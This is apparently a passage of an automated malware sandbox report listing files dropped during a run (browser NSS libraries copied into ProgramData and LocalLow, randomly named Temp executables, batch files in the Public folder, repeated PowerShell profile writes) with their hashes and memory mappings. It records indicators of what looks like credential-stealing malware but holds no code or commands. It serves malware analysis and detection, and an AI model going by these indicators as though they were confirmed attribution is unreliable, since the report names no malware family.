SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll

MD5 02cc7b8ee30056d5912de54f1bdfc219
SHA1 a6923da95705fb81e368ae48f93d28522ef552fb
SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA512 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll

MD5 eae9273f8cdcf9321c6c37c244773139
SHA1 8378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA512 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll

MD5 4e8df049f3459fa94ab6ad387f3561ac
SHA1 06ed392bc29ad9d5fc05ee254c2625fd65925114
SHA256 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA512 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

memory/2560-151-0x0000000000000000-mapping.dmp

memory/572-152-0x0000000000000000-mapping.dmp

memory/3616-153-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/3832-156-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe

MD5 23dd723300b2c35a6c94ab0a53293f82
SHA1 8a7fcbc04ea369cd9c2e2f41b0846b7ed12b0f16
SHA256 0088daad429de39bd42663b9b508af98da7b8a3d09e4b7ff0012a8901a32253b
SHA512 ca20ab23308d75a09b01a857215a4f88e3a9f7ce1355096010acef119ed12de51a44033d149e1b632c677861b5d8617a211e7faa499ad59423b49bd02460f047

C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe

MD5 23dd723300b2c35a6c94ab0a53293f82
SHA1 8a7fcbc04ea369cd9c2e2f41b0846b7ed12b0f16
SHA256 0088daad429de39bd42663b9b508af98da7b8a3d09e4b7ff0012a8901a32253b
SHA512 ca20ab23308d75a09b01a857215a4f88e3a9f7ce1355096010acef119ed12de51a44033d149e1b632c677861b5d8617a211e7faa499ad59423b49bd02460f047

memory/3396-159-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/3832-163-0x00000000020D0000-0x00000000020EB000-memory.dmp

memory/2140-166-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/3396-170-0x0000000000B10000-0x0000000000B11000-memory.dmp

memory/3616-169-0x00000000006C0000-0x00000000006C1000-memory.dmp

memory/2140-172-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

memory/492-171-0x0000000000000000-mapping.dmp

memory/200-173-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

memory/492-180-0x00000000023D0000-0x00000000023EB000-memory.dmp

memory/3028-183-0x0000000000000000-mapping.dmp

memory/3832-184-0x00000000020B0000-0x00000000020B1000-memory.dmp

memory/492-185-0x00000000005E0000-0x000000000072A000-memory.dmp

memory/3396-187-0x0000000007800000-0x0000000007860000-memory.dmp

memory/3616-186-0x0000000004ED0000-0x0000000004F36000-memory.dmp

memory/3616-189-0x0000000007970000-0x0000000007971000-memory.dmp

memory/2140-188-0x00000000054F0000-0x0000000005550000-memory.dmp

memory/3616-192-0x0000000007510000-0x0000000007511000-memory.dmp

memory/3616-195-0x00000000074C0000-0x00000000074C1000-memory.dmp

memory/2140-199-0x0000000005760000-0x0000000005761000-memory.dmp

memory/3396-200-0x0000000005350000-0x0000000005351000-memory.dmp

memory/3616-198-0x0000000004F70000-0x0000000004F71000-memory.dmp

memory/3396-201-0x0000000004DE0000-0x0000000004DE2000-memory.dmp

memory/2140-204-0x0000000005810000-0x0000000005811000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 7c5c07773030f216ff0409611d2f06d1
SHA1 519eaa1e4e4e7f6b07290c5978168e480e401a28
SHA256 daf376acb49aa0f9236dfbc4e7eb75bdc5ae11304797404ba3a080a4c903f296
SHA512 6ae93065172bd4261e526d1f55ffc900c8c93ec567ff0386237379bd4861f330e3848434b3175f1ed8920300947291f7e01e06156068820a46272e22eaaa55d0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 603a92eeda7193c81d81663bdf5e73d7
SHA1 83f882f256ed8be97371ea6d085b1aa1ca0a257b
SHA256 adb6aed4f2100878e771385aea50483231bebba2ecdd864279b920c3565ff7e2
SHA512 cc8078d791ac2ec99ba5dc64914f4d25549ed325c3720717b45b9d3863f64a051c28d6dc641b637b3eae22faf24ac485cd3a135ae6fad932060cf118860ac506

memory/492-210-0x0000000003A30000-0x0000000003A51000-memory.dmp

memory/1648-213-0x0000000000400000-0x0000000000405000-memory.dmp

memory/1648-214-0x0000000000400000-0x0000000000405000-memory.dmp

memory/424-215-0x0000000000400000-0x00000000007E4000-memory.dmp

memory/1648-216-0x0000000000400000-0x0000000000405000-memory.dmp

memory/424-217-0x00000000007E2730-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe

MD5 23dd723300b2c35a6c94ab0a53293f82
SHA1 8a7fcbc04ea369cd9c2e2f41b0846b7ed12b0f16
SHA256 0088daad429de39bd42663b9b508af98da7b8a3d09e4b7ff0012a8901a32253b
SHA512 ca20ab23308d75a09b01a857215a4f88e3a9f7ce1355096010acef119ed12de51a44033d149e1b632c677861b5d8617a211e7faa499ad59423b49bd02460f047

memory/3624-220-0x0000000000000000-mapping.dmp

memory/1648-222-0x00000000004019E4-mapping.dmp

memory/424-221-0x0000000000400000-0x00000000007E4000-memory.dmp

memory/1648-224-0x0000000000400000-0x0000000000405000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

memory/2124-225-0x0000000000000000-mapping.dmp

C:\Users\Public\Trast.bat

MD5 4068c9f69fcd8a171c67f81d4a952a54
SHA1 4d2536a8c28cdcc17465e20d6693fb9e8e713b36
SHA256 24222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810
SHA512 a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d

memory/4064-227-0x0000000000000000-mapping.dmp

memory/2140-229-0x0000000005460000-0x00000000054D2000-memory.dmp

memory/3396-228-0x00000000053F0000-0x0000000005462000-memory.dmp

memory/3616-230-0x0000000005060000-0x00000000050D7000-memory.dmp

memory/3396-231-0x0000000005380000-0x00000000053A0000-memory.dmp

memory/2140-232-0x00000000053F0000-0x000000000540F000-memory.dmp

memory/3616-233-0x0000000004FF0000-0x0000000005016000-memory.dmp

memory/3760-234-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/3760-237-0x0000000000403BEE-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/2112-246-0x0000000000000000-mapping.dmp

memory/1200-244-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/2908-249-0x0000000000000000-mapping.dmp

memory/3632-239-0x000000000040616E-mapping.dmp

memory/3632-236-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Windows\temp\knyx0wed.inf

MD5 8db779d0434eb3ddf134396371628212
SHA1 8b4861426b06661c3bc70e4ce2fad59b12002114
SHA256 bfc515c04a6e1e1ef9286f84f1d8ae06656806ed309674fb20e23fa1006baf27
SHA512 388d88dc8266d04e67548b8f78cced5bf447c774e609b531b4585dd41161fbc31a7742c4f2769d1c34711891d72d21cb5073d83f1a9296c8b460d0c4ffca3555

C:\Users\Admin\AppData\Local\Temp\tmpE85D.tmp

MD5 bc2b6748d2661e9ce52308b3370f3cd3
SHA1 525a293e2aae508e0963f4a4a4c6927f8528e31a
SHA256 44049739773b479c5cbb04a4bf8371d0d365a7be7c65f765c62a57358f346e82
SHA512 568d161df4269764b26ce7c8e1f9ed8a726f6bf7234b8a2b1427ca14c30f90ca789f561a9e815a15940570d542e4baa656c002ff1f4be32dd5c7857b8e576957

memory/2112-254-0x0000000000D30000-0x0000000000D31000-memory.dmp

C:\Users\Public\UKO.bat

MD5 eaf8d967454c3bbddbf2e05a421411f8
SHA1 6170880409b24de75c2dc3d56a506fbff7f6622c
SHA256 f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56
SHA512 fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9

memory/2112-257-0x0000000006F90000-0x0000000006F91000-memory.dmp

memory/2884-259-0x000000000040C71E-mapping.dmp

memory/2884-256-0x0000000000400000-0x0000000000412000-memory.dmp

memory/2888-258-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/504-263-0x0000000000000000-mapping.dmp

memory/2260-264-0x0000000000000000-mapping.dmp

memory/3632-265-0x0000000005410000-0x000000000590E000-memory.dmp

memory/2112-266-0x0000000006950000-0x0000000006951000-memory.dmp

memory/3632-268-0x0000000005410000-0x000000000590E000-memory.dmp

memory/2112-267-0x0000000006C00000-0x0000000006C01000-memory.dmp

memory/2112-269-0x0000000006952000-0x0000000006953000-memory.dmp

memory/2112-270-0x0000000006D80000-0x0000000006D81000-memory.dmp

memory/2112-271-0x0000000006CF0000-0x0000000006CF1000-memory.dmp

memory/2112-273-0x00000000075C0000-0x00000000075C1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\eGEyY1HRgn.exe.log

MD5 0c2899d7c6746f42d5bbe088c777f94c
SHA1 622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1
SHA256 5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458
SHA512 ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

memory/2204-275-0x0000000000000000-mapping.dmp

memory/3156-277-0x0000000000000000-mapping.dmp

C:\Windows\Temp\5j402p4w.exe

MD5 f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1 ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA256 88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA512 02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

memory/2112-276-0x0000000006850000-0x0000000006851000-memory.dmp

C:\Windows\temp\5j402p4w.exe

MD5 f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1 ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA256 88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA512 02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

memory/1180-283-0x0000000000000000-mapping.dmp

memory/3812-284-0x0000000000000000-mapping.dmp

memory/3812-299-0x0000029E7B173000-0x0000029E7B175000-memory.dmp

memory/3812-298-0x0000029E7B170000-0x0000029E7B172000-memory.dmp

memory/2884-300-0x0000000005450000-0x0000000005451000-memory.dmp

memory/3812-301-0x0000029E7B176000-0x0000029E7B178000-memory.dmp

memory/2112-343-0x000000007E540000-0x000000007E541000-memory.dmp

memory/2204-347-0x0000000000000000-mapping.dmp

memory/3520-348-0x0000000000000000-mapping.dmp

memory/3000-349-0x0000000000000000-mapping.dmp

memory/3976-352-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

memory/2644-358-0x0000000000000000-mapping.dmp

memory/2600-366-0x0000000000000000-mapping.dmp

memory/2112-371-0x0000000006953000-0x0000000006954000-memory.dmp

memory/2204-374-0x000001CCB8CD0000-0x000001CCB8CD2000-memory.dmp

memory/2204-377-0x000001CCB8CD3000-0x000001CCB8CD5000-memory.dmp

memory/3520-380-0x000001EA01480000-0x000001EA01482000-memory.dmp

memory/3520-383-0x000001EA01483000-0x000001EA01485000-memory.dmp

memory/3000-388-0x000002CABE170000-0x000002CABE172000-memory.dmp

memory/4228-385-0x0000000000000000-mapping.dmp

memory/3000-392-0x000002CABE173000-0x000002CABE175000-memory.dmp

memory/4364-397-0x0000000000000000-mapping.dmp

memory/4500-406-0x0000000000000000-mapping.dmp

memory/4620-415-0x0000000000000000-mapping.dmp

memory/4704-420-0x0000000000000000-mapping.dmp

memory/4764-425-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2703180e64df93bbcc34f7701979fd13
SHA1 c9265214fdd8c4fa9cb6b3977b0e05fc8c25125b
SHA256 0d0b3fed5285ce6cddc06f3c15d6cccb68e23d8a027d0cba6226100f130ae173
SHA512 8b711d620a4d10d044ddf5c4fa83169304886a998ea11671b9de992383fd9d39cfeebb9ffdfaafb44ef27cb91a54ac732463779a672889d1b5be33cc4207e4f3

memory/3976-436-0x000002299AB30000-0x000002299AB32000-memory.dmp

memory/4984-443-0x0000000000000000-mapping.dmp

memory/3976-440-0x000002299AB33000-0x000002299AB35000-memory.dmp

memory/2644-447-0x0000020F3BE33000-0x0000020F3BE35000-memory.dmp

memory/2644-444-0x0000020F3BE30000-0x0000020F3BE32000-memory.dmp

memory/2600-450-0x000001F2B9750000-0x000001F2B9752000-memory.dmp

memory/4500-455-0x00000241294E0000-0x00000241294E2000-memory.dmp

memory/4500-459-0x00000241294E3000-0x00000241294E5000-memory.dmp

memory/2600-461-0x000001F2B9753000-0x000001F2B9755000-memory.dmp

memory/4620-466-0x0000023F3AF50000-0x0000023F3AF52000-memory.dmp

memory/4620-472-0x0000023F3AF53000-0x0000023F3AF55000-memory.dmp

memory/4228-476-0x00000294FF650000-0x00000294FF652000-memory.dmp

memory/4228-478-0x00000294FF653000-0x00000294FF655000-memory.dmp

memory/4764-486-0x000001ECF6E93000-0x000001ECF6E95000-memory.dmp

memory/4764-481-0x000001ECF6E90000-0x000001ECF6E92000-memory.dmp

memory/4364-488-0x000001DFD3470000-0x000001DFD3472000-memory.dmp

memory/4364-491-0x000001DFD3473000-0x000001DFD3475000-memory.dmp

C:\Users\Public\nest.bat

MD5 8ada51400b7915de2124baaf75e3414c
SHA1 1a7b9db12184ab7fd7fce1c383f9670a00adb081
SHA256 45aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7
SHA512 9afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68

memory/4984-534-0x000002AC7BB70000-0x000002AC7BB72000-memory.dmp

memory/4984-536-0x000002AC7BB73000-0x000002AC7BB75000-memory.dmp

memory/3000-540-0x000002CABE176000-0x000002CABE178000-memory.dmp

memory/4756-544-0x0000000000000000-mapping.dmp

memory/3520-607-0x000001EA01486000-0x000001EA01488000-memory.dmp

memory/2204-605-0x000001CCB8CD6000-0x000001CCB8CD8000-memory.dmp

memory/2600-644-0x000001F2B9756000-0x000001F2B9758000-memory.dmp

memory/3976-641-0x000002299AB36000-0x000002299AB38000-memory.dmp

memory/2644-646-0x0000020F3BE36000-0x0000020F3BE38000-memory.dmp

memory/4364-682-0x000001DFD3476000-0x000001DFD3478000-memory.dmp

memory/4500-687-0x00000241294E6000-0x00000241294E8000-memory.dmp

memory/4228-695-0x00000294FF656000-0x00000294FF658000-memory.dmp

memory/4620-691-0x0000023F3AF56000-0x0000023F3AF58000-memory.dmp

memory/4764-738-0x000001ECF6E96000-0x000001ECF6E98000-memory.dmp

memory/4984-782-0x000002AC7BB76000-0x000002AC7BB78000-memory.dmp

memory/3000-1007-0x000002CABE178000-0x000002CABE179000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7da67fae516954e5aa76aaa9803fc518
SHA1 8f80266076379de1f5c54c46647d9917598fa6fe
SHA256 c192ad2a2901e61158926110db73b5b39436198b536cc83a2b94c4c93ed9cd9c
SHA512 89a37e5e1764148b98f7898a6d016cee9aedd3c7277b1864b02e8f30229d377bb5b4f1fb338f5b9b8d32e9202fb9262feb82ed2beaa30f785d93adcd7b659c13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e9f583acc0bc47529362031be117a67f
SHA1 fd6ae4d148a5a929adb4f8aeea4598fee8b5632b
SHA256 9e36f922cdd1a2ee707b855b7602948b3488acbb57fa4b7b9f941252de50e1cb
SHA512 89f589caad02264078a203708dad7db2bcc2a9e65c39daac66734d5dca524b085339473ba7247c04dd19c41c22b06cd87545c82f24559a5498b8241f68d857fd

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9mbL1Q6aMm.exe.log

MD5 0c2899d7c6746f42d5bbe088c777f94c
SHA1 622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1
SHA256 5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458
SHA512 ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e7fbe7a8da9b46f947deb2a02e6a293a
SHA1 0ad189b28e53dcbd009b42cd7eb2430a65ca3dd0
SHA256 951ab267c169c9ee3d704a97b555e5c0edc0622ab4a61cddddcbebf6600fe4fd
SHA512 d3b8bb243f93d651616a151e8f7cf23e6064ea0c53cef7f884ee6e4021dcfeb9162882bba17a298aa959f086ade78e6280c7637be514015659b842da07abf638

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c4a1170749620a355075b19d68f94c45
SHA1 44c72e0567e8c23dc20756b2d67a05b1f1c382f4
SHA256 61110a7a59f15f40d850aff166176709c60659a9dd13359a2522d1abebd7fc28
SHA512 985ae4e05070ce3a1c870bf9bfef2b439bc1571d3b97c17cdcd2630ebec209e74d5e77f8025c1e0ac2949cbddb0148990b3df92c844cfad8a8805de249dcda95

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4c4be4c0fec9602d69dcf439fd31fc22
SHA1 a9d1c38bb4b66804a72a6d6e2125ef142e3b5a7e
SHA256 325a8917d99e3d1139e13b6dfcd48ee05607ea4cf2e9d82586400a5b506871e9
SHA512 8d48abc5b0c9d66cc26cc2bd44b383a010772b9fef48dee8d334e7e95126cfa258c501ff9380ced58fad175fa680db3e5d12b820e4b3125521874835c803d268

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5ba0139766ca30cf3f464824d085b10c
SHA1 5ed3957458fdbb0808aa728fbe1909f980027dfd
SHA256 b7bbec16489e7f4150e344354c2f29ddd05bdd6ca0cfa0f1b4261afc90a746a8
SHA512 8ac5e3cfd0dba656181a65e25ca25531defc0882c70d40063b56c1733a3d6d916fd440d439cc2e69b64f2cc188868642082f29373f5a96c8191fcaa3ce44eaf1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5ba0139766ca30cf3f464824d085b10c
SHA1 5ed3957458fdbb0808aa728fbe1909f980027dfd
SHA256 b7bbec16489e7f4150e344354c2f29ddd05bdd6ca0cfa0f1b4261afc90a746a8
SHA512 8ac5e3cfd0dba656181a65e25ca25531defc0882c70d40063b56c1733a3d6d916fd440d439cc2e69b64f2cc188868642082f29373f5a96c8191fcaa3ce44eaf1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 910aa6d9c2c158f6cdc2b70bed5f8e21
SHA1 92aaf8e3712de7214db3363cf889adcbf505262a
SHA256 49f19d00e846ec6dd9ddbf52d34a0d1242bf06545c15a827aa17574730f7f983
SHA512 13ed87b34afa1a4575eaa45fffba2fbcc1ea41308906fd9cd2cea351eca7d482f9440f8439a82b0e3b64fd9c80dcbe61d80b8894fdeeeac5a55fb6729b3a8c17

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c98616c86234db93dccdfb357228418c
SHA1 e6f7195988be75fce8bd20d7a10cb3f94dae610c
SHA256 699a1cff1f1ef5bdc06568bd9b10cf93f51ae1cfaff3794648872d8434cebf72
SHA512 57bc0dee56a6087152d71f6cd64a197fd721b1ef6027aa88bafd060a96bb6c99207f5eb3d6d9a419623f885ed99996809d2776ce436a86504a1320eb85b9eb68

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 368b32a9ff59549cdd930323b9f865b4
SHA1 94289afbd7d4a4e651ca376b88174074939e2aef
